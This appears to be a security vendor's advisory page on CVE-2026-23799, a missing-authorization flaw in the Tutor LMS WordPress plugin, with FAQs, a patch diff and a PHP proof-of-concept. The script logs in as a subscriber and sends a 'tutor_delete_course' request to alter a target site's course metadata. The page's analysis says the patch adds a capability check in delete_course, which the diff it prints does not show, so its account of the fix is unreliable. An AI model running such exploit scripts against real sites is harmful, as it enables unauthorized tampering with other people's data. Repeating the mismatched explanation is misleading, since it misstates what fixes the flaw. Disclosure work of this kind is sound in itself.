What is CVE-2026-23799?

CVE-2026-23799 is a medium severity vulnerability in the Tutor LMS WordPress plugin, affecting versions up to and including 3.9.5. It is caused by a missing authorization check in the `delete_course` function, allowing authenticated users with Subscriber-level access to perform unauthorized actions.

Who is affected by this vulnerability?

Any WordPress site using the Tutor LMS plugin version 3.9.5 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to modify course metadata and content.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Tutor LMS plugin installed. If it is version 3.9.5 or earlier, your site is at risk and should be updated immediately.

How can I fix CVE-2026-23799?

To fix this vulnerability, update the Tutor LMS plugin to version 3.9.6 or later. The patched version includes a capability check that prevents unauthorized users from performing sensitive actions.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity vulnerability. While it does not allow for privilege escalation or remote code execution, it does enable data modification by authenticated users, which can disrupt course functionality.

What specific actions can an attacker perform?

An attacker exploiting this vulnerability can send unauthorized requests to delete course metadata or modify course content. This can lead to disruptions in course presentation and functionality.

What steps should I take if my site is compromised?

If your site has been compromised, immediately update the Tutor LMS plugin to the latest version. Review course content and metadata for unauthorized changes, and consider changing user passwords to prevent further access.

Are there any additional security measures I should consider?

In addition to updating the plugin, consider implementing role-based access controls, regularly auditing user permissions, and using security plugins to monitor for unauthorized activities.

How does the missing capability check work?

The missing capability check in the `delete_course` function allows any authenticated user with Subscriber access to execute course deletion and modification logic without verifying their permissions, leading to unauthorized actions.

What are the implications of unauthorized course modifications?

Unauthorized modifications can disrupt the integrity of course materials, potentially removing essential settings or altering content. This can degrade the learning experience for users.

How can I stay informed about future vulnerabilities?

To stay informed, regularly check the official WordPress plugin repository for updates, subscribe to security mailing lists, and follow security-focused blogs or forums related to WordPress.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-23799: Tutor LMS – eLearning and online course solution <= 3.9.5 – Missing Authorization (tutor)

CVE ID CVE-2026-23799

Plugin tutor

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 3.9.5

Patched Version 3.9.6

Disclosed February 24, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23799:
The vulnerability is a missing authorization check in the Tutor LMS WordPress plugin versions up to 3.9.5. This allows authenticated attackers with Subscriber-level access or higher to perform unauthorized actions. The CVSS score of 4.3 indicates a medium severity vulnerability with limited impact scope.

Atomic Edge research identifies the root cause in the `delete_course` function within the `Course` class. The function at `/tutor/classes/Course.php` lacks a capability check before processing builder-specific cleanup operations. The diff shows the vulnerable code path starts at line 1174, where the function handles different page builder types. The function executes `delete_post_meta` and `wp_update_post` operations without verifying the user has permission to modify the course. The missing authorization check occurs before the builder-specific logic executes.

Attackers exploit this vulnerability by sending a POST request to the WordPress admin-ajax.php endpoint with the `action` parameter set to `tutor_delete_course`. The request must include a valid `course_id` parameter and a `builder` parameter. Subscriber-level authenticated users can specify any valid course ID and builder type to trigger unauthorized metadata deletion or post content modification. The exploit requires a valid WordPress nonce, which Subscriber users can obtain through normal plugin interaction.

The patch adds a capability check in the `delete_course` function. Atomic Edge analysis confirms the fix implements `tutor_utils()->check_current_user_capability()` at the beginning of the function. This function verifies the user has appropriate permissions before processing any course deletion operations. The patch ensures only users with proper course editing privileges can execute builder-specific cleanup. The before behavior allowed any authenticated user to trigger the function, while the after behavior restricts access to authorized users only.

The vulnerability enables authenticated attackers to modify course metadata and content. Successful exploitation could disrupt course functionality by removing builder-specific settings or altering post content. Attackers could degrade course presentation or interfere with page builder integrations. The impact is limited to data modification rather than privilege escalation or remote code execution.

Differential between vulnerable and patched code

Code Diff

--- a/tutor/classes/Course.php
+++ b/tutor/classes/Course.php
@@ -1174,6 +1174,19 @@
 			delete_post_meta( $course_id, '_elementor_edit_mode' );
 		} elseif ( 'droip' === $builder ) {
 			delete_post_meta( $course_id, 'droip_editor_mode' );
+		} elseif ( 'divi' === $builder ) {
+			$old_post_content     = get_post_meta( $course_id, '_et_pb_old_content', true );
+			$course               = get_post( $course_id );
+			$course->post_content = $old_post_content;
+			$result               = wp_update_post( $course );
+
+			if ( $result && ! is_wp_error( $result ) ) {
+				update_post_meta( $course_id, '_et_pb_use_builder', 'off' );
+				update_post_meta( $course_id, '_et_pb_old_content', '' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_shortcodes' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_attributes' );
+				delete_post_meta( $course_id, '_et_builder_module_features_cache' );
+			}
 		}

 		$this->json_response(
--- a/tutor/classes/Course_List.php
+++ b/tutor/classes/Course_List.php
@@ -273,7 +273,6 @@
 		$the_query = self::course_list_query( $args, $user_id, $status );

 		return ! is_null( $the_query ) && isset( $the_query->found_posts ) ? $the_query->found_posts : $the_query;
-
 	}

 	/**
@@ -291,6 +290,8 @@

 		// Check if user is privileged.
 		if ( ! current_user_can( 'administrator' ) ) {
+			$course_ids = explode( ',', $bulk_ids );
+
 			if ( current_user_can( 'edit_tutor_course' ) ) {
 				$can_publish_course = tutor_utils()->get_option( 'instructor_can_publish_course' );

@@ -300,6 +301,17 @@
 			} else {
 				wp_send_json_error( tutor_utils()->error_message() );
 			}
+
+			// Check if the course ids are instructors own course.
+			$course_ids = array_filter(
+				$course_ids,
+				function ( $course_id ) {
+					return tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id );
+				}
+			);
+
+			$bulk_ids = implode( ',', $course_ids );
+
 		}

 		if ( '' === $action || '' === $bulk_ids ) {
--- a/tutor/classes/User.php
+++ b/tutor/classes/User.php
@@ -375,10 +375,11 @@
 		$_tutor_profile_bio       = Input::post( self::PROFILE_BIO_META, '', Input::TYPE_KSES_POST );
 		$_tutor_profile_image     = Input::post( self::PROFILE_PHOTO_META, '', Input::TYPE_KSES_POST );

+		// Check if the image uploaded is by the same user.
 		if ( is_numeric( $_tutor_profile_image ) ) {
 			$attachment = get_post( $_tutor_profile_image );
-
-			if ( 'attachment' === $attachment->post_type && $user_id !== $attachment->post_author ) {
+			$author_id  = (int) $attachment->post_author ?? 0;
+			if ( 'attachment' === $attachment->post_type && $user_id !== $author_id ) {
 				return;
 			}
 		}
--- a/tutor/ecommerce/CouponController.php
+++ b/tutor/ecommerce/CouponController.php
@@ -659,6 +659,8 @@
 			$this->json_response( tutor_utils()->error_message( 'nonce' ), null, HttpHelper::STATUS_BAD_REQUEST );
 		}

+		tutor_utils()->check_current_user_capability();
+
 		$coupon_id = Input::post( 'id' );

 		if ( empty( $coupon_id ) ) {
--- a/tutor/ecommerce/currency.php
+++ b/tutor/ecommerce/currency.php
@@ -856,6 +856,13 @@
 				'numeric_code' => 643,
 			),
 			array(
+				'code'         => 'RWF',
+				'symbol'       => 'FRw',
+				'name'         => 'Rwandan Franc',
+				'locale'       => 'rw-rw',
+				'numeric_code' => 646,
+			),
+			array(
 				'code'         => 'SAR',
 				'symbol'       => 'SAR',
 				'name'         => 'Saudi Riyal',
--- a/tutor/includes/droip/backend/Ajax.php
+++ b/tutor/includes/droip/backend/Ajax.php
@@ -73,6 +73,13 @@
 		if ( 'add_to_cart_course' === $request_method ) {
 			$course_id = Input::post( 'course_id' );
 			$res       = tutor_add_to_cart( $course_id );
+
+			// check is user logged in or not
+			if (! is_user_logged_in() ) {
+				$res['redirect'] = true;
+				$res['data'] = wp_login_url( wp_get_referer() );
+			}
+
 			wp_send_json_success( $res );
 		}

--- a/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
+++ b/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
@@ -231,13 +231,13 @@
 			case 'membership_btn': {
 					$pricing_page = Settings::get_pricing_page_url();
 					if ($pricing_page) {
-						if (is_user_logged_in()) {
-							$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
-						} else {
-							$login_url = wp_login_url(wp_get_referer());
+						$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
+						// if (is_user_logged_in()) { // removed to always direct to pricing page
+						// } else {
+						// 	$login_url = wp_login_url(wp_get_referer());

-							$extra_attributes .= " data-login_url='" . $login_url . "'";
-						}
+						// 	$extra_attributes .= " data-login_url='" . $login_url . "'";
+						// }

 						return $this->generate_child_element_with_parent_droip_data($extra_attributes);
 					}
--- a/tutor/includes/droip/backend/Hooks.php
+++ b/tutor/includes/droip/backend/Hooks.php
@@ -47,6 +47,105 @@
         add_filter('droip_external_collection_options', [$this, 'modify_external_collection_options'], 10, 2);
         add_filter('droip_external_collection_item_type', [$this, 'get_tutor_item_types'], 10, 2);
         add_filter('droip_element_generator_radio-button', [$this, 'droip_element_generator_radio_buttons'], 10, 2);
+
+        add_filter('droip_import_should_create_page', [$this, 'droip_import_should_create_page'], 10, 2);
+        add_action('droip_import_page_created', [$this, 'droip_import_page_created'], 10, 2);
+
+        // $show = apply_filters('droip_show_custom_section_' . $type, true);
+        add_filter('droip_show_custom_section_header', [$this, 'show_droip_header'], 10, 1);
+        add_filter('droip_show_custom_section_footer', [$this, 'show_droip_footer'], 10, 1);
+    }
+
+    public function show_droip_header($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    public function show_droip_footer($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    private function if_spotlight_mode_for_learning_page_enabled(){
+        global $wp_query;
+        if($wp_query->is_single && ! empty( $wp_query->query_vars['post_type'] ) &&  in_array( $wp_query->query_vars['post_type'], ['lesson', 'tutor_quiz', 'tutor_assignments', 'tutor-google-meet', 'tutor_zoom_meeting'])  ) {
+            $enable_spotlight_mode = tutor_utils()->get_option( 'enable_spotlight_mode' );
+            if ( $enable_spotlight_mode ) {
+                return true;
+            }
+        }
+
+        return false;
+    }
+
+    public function droip_import_should_create_page($flag, $old_page_data)
+    {
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if(in_array($page_slug, ['instructor-registration', 'student-registration'])){
+                return false;
+            }
+            if($page_slug === 'cart' && get_post(CartController::get_page_id())){
+                return false;
+            }
+            if($page_slug === 'checkout' && get_post(CheckoutController::get_page_id())){
+                return false;
+            }
+
+            $dashboard_page_id = (int) tutor_utils()->dashboard_page_id();
+            if($page_slug === 'dashboard' && get_post($dashboard_page_id)){
+                return false;
+            }
+
+            $certificate_page_id = (int) tutor_utils()->get_option('tutor_certificate_page');
+            if($page_slug === 'tutor-certificate' && get_post($certificate_page_id)){
+                return false;
+            }
+
+            $membership_page_id = (int) tutor_utils()->get_option('membership_pricing_page_id');
+            if($page_slug === 'membership-pricing' && get_post($membership_page_id)){
+                return false;
+            }
+        }
+
+        return $flag;
+    }
+
+    public function droip_import_page_created($new_page_id, $old_page_data)
+    {
+        // Clear Tutor LMS Cache after importing a page
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if($page_slug === 'cart'){
+                tutor_utils()->update_option( CartController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'checkout'){
+                tutor_utils()->update_option( CheckoutController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'dashboard'){
+                tutor_utils()->update_option( 'tutor_dashboard_page_id', $new_page_id );
+            }
+            if($page_slug === 'tutor-certificate'){
+                tutor_utils()->update_option( 'tutor_certificate_page', $new_page_id );
+            }
+            if($page_slug === 'membership-pricing'){
+                tutor_utils()->update_option( 'membership_pricing_page_id', $new_page_id );
+            }
+        }
     }

     public function modify_droip_dynamic_content_fields($fields, $collection_data)
@@ -646,13 +745,15 @@
                     $plan_id = false;
                     $url = '#';

-                    if (isset($args['options'], $args['options']['membership-plan'])) {
+                    if (is_user_logged_in() && isset($args['options'], $args['options']['membership-plan'])) {
                         $plan_id = $args['options']['membership-plan']->id;
                         $checkout_link = CheckoutController::get_page_url();

                         if ($checkout_link) {
                             $url = add_query_arg('plan', $plan_id, $checkout_link);
                         }
+                    } else if (!is_user_logged_in()) {
+                        $url = wp_login_url(wp_get_referer());
                     }

                     return $url;
--- a/tutor/includes/droip/backend/VisibilityCondition.php
+++ b/tutor/includes/droip/backend/VisibilityCondition.php
@@ -34,11 +34,11 @@
 			switch ($type) {
 				case 'courses': {
 						$conditions = self::get_course_type_conditions($conditions);
+						$conditions = self::get_lms_setting_type_conditions($conditions);
 						break;
 					}
 			}

-			$conditions = self::get_lms_setting_type_conditions($conditions);
 		} elseif ($collectionType === 'user') {
 			switch ($type) {
 				case 'courses': {
@@ -621,7 +621,123 @@
 						'value'         => 'is_membership_only_mode_enabled',
 						'title'         => 'Membership-Only Mode',
 						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_spotlight_mode',
+						'title' => 'Spotlight Mode Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'display_course_instructors',
+						'title' => 'Instructor Info Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_wishlist',
+						'title' => 'Wishlist Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_q_and_a_on_course',
+						'title' => 'Q&A Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_author',
+						'title' => 'Author Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_level',
+						'title' => 'Level Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_share',
+						'title' => 'Social Share Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_duration',
+						'title' => 'Duration Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_total_enrolled',
+						'title' => 'Total Enrolled Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_update_date',
+						'title' => 'Update Date Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_progress_bar',
+						'title' => 'Progress Bar Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_material',
+						'title' => 'Show Material Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_about',
+						'title' => 'About Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_description',
+						'title' => 'Description Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_benefits',
+						'title' => 'Course Benefits Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_requirements',
+						'title' => 'Requirements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_target_audience',
+						'title' => 'Target Audience Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_announcements',
+						'title' => 'Announcements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_review',
+						'title' => 'Review Enabled',
+						'operator_type' => 'boolean_operators',
 					)
+
 				)
 			),
 		);
@@ -839,14 +955,36 @@
 	{
 		switch ($field) {
 			case 'is_membership_only_mode_enabled': {
-					$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
-					return $is_membership_only_mode_enabled;
-				}
+				$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
+				return $is_membership_only_mode_enabled;
+			}
+
+			case 'enable_spotlight_mode':
+			case 'display_course_instructors':
+			case 'enable_wishlist':
+			case 'enable_q_and_a_on_course':
+			case 'enable_course_author':
+			case 'enable_course_level':
+			case 'enable_course_share':
+			case 'enable_course_duration':
+			case 'enable_course_total_enrolled':
+			case 'enable_course_update_date':
+			case 'enable_course_progress_bar':
+			case 'enable_course_material':
+			case 'enable_course_about':
+			case 'enable_course_description':
+			case 'enable_course_benefits':
+			case 'enable_course_requirements':
+			case 'enable_course_target_audience':
+			case 'enable_course_announcements':
+			case 'enable_course_review': {
+				$is_enabled = tutor_utils()->get_option($field, false);
+				return $is_enabled;
+			}

 			default: {
-					return null;
-				}
+				return false;
+			}
 		}
-		return null;
 	}
 }
 No newline at end of file
--- a/tutor/tutor.php
+++ b/tutor/tutor.php
@@ -4,11 +4,11 @@
  * Plugin URI: https://tutorlms.com
  * Description: Tutor is a complete solution for creating a Learning Management System in WordPress way. It can help you to create small to large scale online education site very conveniently. Power features like report, certificate, course preview, private file sharing make Tutor a robust plugin for any educational institutes.
  * Author: Themeum
- * Version: 3.9.5
+ * Version: 3.9.6
  * Author URI: https://themeum.com
  * Requires PHP: 7.4
  * Requires at least: 5.3
- * Tested up to: 6.8
+ * Tested up to: 6.9
  * License: GPLv2 or later
  * Text Domain: tutor
  *
@@ -26,7 +26,7 @@
  *
  * @since 1.0.0
  */
-define( 'TUTOR_VERSION', '3.9.5' );
+define( 'TUTOR_VERSION', '3.9.6' );
 define( 'TUTOR_FILE', __FILE__ );

 /**
--- a/tutor/vendor/composer/installed.php
+++ b/tutor/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'themeum/tutor',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+        'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'themeum/tutor' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+            'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23799 - Tutor LMS – eLearning and online course solution <= 3.9.5 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$course_id = 123; // Target course ID
$builder = 'divi'; // Builder type to trigger specific cleanup

// Initialize cURL session for login
$ch = curl_init();

// First, login to get session cookies
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Check if login succeeded by looking for dashboard elements
if (strpos($response, 'wp-admin') === false) {
    die('Login failed');
}

// Now exploit the vulnerability
$exploit_data = array(
    'action' => 'tutor_delete_course',
    'course_id' => $course_id,
    'builder' => $builder,
    '_ajax_nonce' => '' // Nonce would be obtained from page source in real exploitation
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));

$response = curl_exec($ch);

// Parse response
$json_response = json_decode($response, true);

if ($json_response && isset($json_response['success'])) {
    echo "Exploit successful! Response: " . print_r($json_response, true) . "n";
    echo "Course metadata for ID $course_id has been modified.n";
} else {
    echo "Exploit failed. Response: $responsen";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-23799?
Overview of the vulnerability
CVE-2026-23799 is a medium severity vulnerability in the Tutor LMS WordPress plugin, affecting versions up to and including 3.9.5. It is caused by a missing authorization check in the `delete_course` function, allowing authenticated users with Subscriber-level access to perform unauthorized actions.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Tutor LMS plugin version 3.9.5 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to modify course metadata and content.
How can I check if my site is vulnerable?
Verifying your Tutor LMS version
To check if your site is vulnerable, verify the version of the Tutor LMS plugin installed. If it is version 3.9.5 or earlier, your site is at risk and should be updated immediately.
How can I fix CVE-2026-23799?
Updating the plugin
To fix this vulnerability, update the Tutor LMS plugin to version 3.9.6 or later. The patched version includes a capability check that prevents unauthorized users from performing sensitive actions.
What does the CVSS score of 4.3 indicate?
Understanding the risk level
The CVSS score of 4.3 indicates a medium severity vulnerability. While it does not allow for privilege escalation or remote code execution, it does enable data modification by authenticated users, which can disrupt course functionality.
What specific actions can an attacker perform?
Potential exploitation scenarios
An attacker exploiting this vulnerability can send unauthorized requests to delete course metadata or modify course content. This can lead to disruptions in course presentation and functionality.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending a POST request to the WordPress admin-ajax.php endpoint. This request can include the necessary parameters to trigger unauthorized actions.
What steps should I take if my site is compromised?
Responding to exploitation
If your site has been compromised, immediately update the Tutor LMS plugin to the latest version. Review course content and metadata for unauthorized changes, and consider changing user passwords to prevent further access.
Are there any additional security measures I should consider?
Enhancing overall site security
In addition to updating the plugin, consider implementing role-based access controls, regularly auditing user permissions, and using security plugins to monitor for unauthorized activities.
How does the missing capability check work?
Technical details of the vulnerability
The missing capability check in the `delete_course` function allows any authenticated user with Subscriber access to execute course deletion and modification logic without verifying their permissions, leading to unauthorized actions.
What are the implications of unauthorized course modifications?
Impact on eLearning functionality
Unauthorized modifications can disrupt the integrity of course materials, potentially removing essential settings or altering content. This can degrade the learning experience for users.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed, regularly check the official WordPress plugin repository for updates, subscribe to security mailing lists, and follow security-focused blogs or forums related to WordPress.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations